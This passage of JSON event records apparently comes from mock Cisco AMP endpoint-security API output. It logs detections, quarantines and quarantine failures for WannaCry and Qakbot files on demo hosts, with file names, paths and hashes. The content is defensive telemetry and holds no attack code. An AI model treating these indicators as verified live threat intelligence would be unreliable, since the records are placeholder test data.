Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":111000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 